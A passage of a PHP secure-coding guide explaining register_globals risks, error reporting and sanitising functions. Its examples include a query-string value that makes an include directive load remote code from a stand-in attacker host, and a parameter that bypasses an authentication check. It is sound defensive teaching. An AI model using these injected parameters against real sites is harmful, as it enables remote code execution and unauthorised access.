PHP Security Leading Practice

Global Variables
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0

Include directives in PHP can be vulnerable if register_globals is enabled.

<?PHP include "$dir/script/dostuff.php"; ?>

With register_globals enabled the $dir variable can be passed in via the query string: ?dir=http://www.haxor.com/gimmeeverything.php This would result in the $dir being set to: <?PHP include "http://www.haxor.com/gimmeeverything.php"; ?>

Appending global variables to the URL may be a way to circumvent authentication: <?PHP if(authenticated_user) { $authorised=true; } if($authorised) { give_family_jewels } ?>

if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.

Error handling
If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.

Good Things to Use
strip_tags: Removes any HTML from a String nl2br: Converts new line characters to HTML break "br" htmlspecialchars: